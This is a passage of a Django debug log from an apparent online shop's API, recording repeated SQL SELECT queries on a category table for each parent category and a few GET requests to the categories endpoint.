"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) [19/Dec/2019 13:53:46] "GET /api/v1/categories/8 HTTP/1.0" 200 944 DEBUG 2019-12-19 13:53:46,289 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:53:46,297 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:53:46,300 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:53:46,302 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:53:46,306 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:53:46,308 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:53:46,310 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:53:46,312 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:53:46,315 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:53:46,318 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:53:46,320 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:53:46,323 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:53:46,325 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:53:46,328 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:53:46,331 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:53:46,334 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:53:46,336 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:53:46,339 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:53:46,342 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:53:46,348 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:53:46,351 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:53:46,354 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:53:46,357 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:53:46,360 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:53:46,363 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:53:46,368 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:53:46,371 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:53:46,373 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:53:46,375 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:53:46,377 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:53:46,381 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:53:46,383 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:53:46,385 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:53:46,388 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:53:46,390 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:53:46,396 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:53:46,399 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:53:46,401 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:53:46,405 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:53:46,408 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:53:46,411 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:53:46,414 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:53:46,417 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:53:46,419 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:53:46,422 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:53:46,424 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:53:46] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:53:46,732 utils 4252 140031492613888 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:53:46,748 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:53:46,757 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:53:46,763 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:53:46,772 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:53:46,778 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:53:46,784 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:53:46,790 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:53:46,796 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:53:46,804 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:53:46,809 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:53:46,813 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:53:46,816 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:53:46,819 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:53:46,824 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:53:46,827 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:53:46,831 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:53:46,835 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:53:46,838 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:53:46,844 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:53:46,848 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 